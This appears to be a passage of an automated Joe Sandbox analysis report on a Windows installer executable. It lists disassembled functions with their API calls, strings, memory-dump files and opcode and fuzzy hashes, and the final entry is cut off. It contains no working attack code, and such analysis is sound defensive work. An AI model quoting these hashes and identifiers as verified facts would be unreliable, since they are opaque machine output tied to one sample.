                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: +C@$Call$N
                                                • API String ID: 3103080414-3697844480
                                                • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                • wsprintfA.USER32 ref: 00405F4D
                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1114763981
                                                • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                • GetSysColor.USER32(00000000), ref: 004042B7
                                                • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                • SetBkMode.GDI32(?,?), ref: 004042CF
                                                • GetSysColor.USER32(?), ref: 004042E2
                                                • SetBkColor.GDI32(?,?), ref: 004042F2
                                                • DeleteObject.GDI32(?), ref: 0040430C
                                                • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                Function 100022D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @Hmu
                                                • API String ID: 4216380887-887474944
                                                • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                • GetMessagePos.USER32 ref: 00404BD3
                                                • ScreenToClient.USER32(?,?), ref: 00404BED
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                • MulDiv.KERNEL32(000F0CEB,00000064,000F0EEF), ref: 00402E20
                                                • wsprintfW.USER32 ref: 00402E30
                                                • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32(?), ref: 1000256D
                                                • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                • GlobalFree.KERNEL32(?), ref: 00402950
                                                • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp$C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll
                                                • API String ID: 3109718747-3571912477
                                                • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
